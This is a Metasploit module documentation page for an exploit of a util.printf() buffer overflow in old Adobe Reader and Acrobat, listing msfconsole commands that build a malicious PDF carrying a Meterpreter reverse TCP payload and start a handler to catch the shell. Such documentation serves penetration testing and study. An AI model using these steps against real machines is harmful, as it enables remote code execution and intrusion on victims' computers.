Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/fileformat/adobe_utilprintf.md
Views: 11788
Vulnerable Application
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
entry, an attacker may be able to execute arbitrary code.
Link to vulnerable software OldVersion
Verification Steps
Install application on the target machine
Start msfconsole
Do:
use exploit/windows/fileformat/adobe_utilprintf
Do:
set payload [windows/meterpreter/reverse_tcp]
Do:
set LHOST [IP]
Do:
exploit
Do:
use exploit/multi/handler
Do:
set LHOST [IP]
Do:
exploit
Do: Open PDF on target machine with vulnerable software